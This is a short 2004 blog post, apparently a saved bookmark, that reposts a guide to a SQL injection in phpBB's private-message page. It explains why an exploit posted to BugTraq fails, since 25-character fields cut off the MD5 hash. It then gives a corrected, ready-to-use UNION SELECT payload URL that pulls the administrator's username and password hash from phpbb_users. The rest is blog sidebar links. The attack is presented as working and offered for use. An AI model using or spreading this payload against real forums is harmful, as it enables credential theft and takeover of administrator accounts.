http://www.really-fine.com/SQL_union.html
phpbb union sql injection
The exploit included in the BugTraq post DOES NOT work. Here is why.
Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is each field only is able to hold 25 characters at most.
Most of you might be saying "Well, an MD5 hash is 32bytes" You are correct. So you may get a incomplete hash, but an incomplete hash cannot be cracked.
Now lets look at how to get it to work. Lets have a look at the table strcuture of phpbb_privmsgs We need a place that will hold at LEAST 32 bytes. Well, the subject field is varchar(255) Lets go ahead and put the username there.
Now, we will place the password in privmsgs_text and we are good to go :)
CODE
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Thats all there is to it :)
Friday, April 02, 2004
just raw bookmarks
Previous Posts
- John Sterman All Models are Wrong: Reflections on ...
- Internet News usenet system open source
- nntp//rss
- myRSS: Bloomberg.com Channel Information
- .
- ecommerce
- moreover search simply replace query
- moreover...china news
- o=xml or js or...
- moreover list of rss feeds Business: general Full...
0 Comments:
Post a Comment
<< Home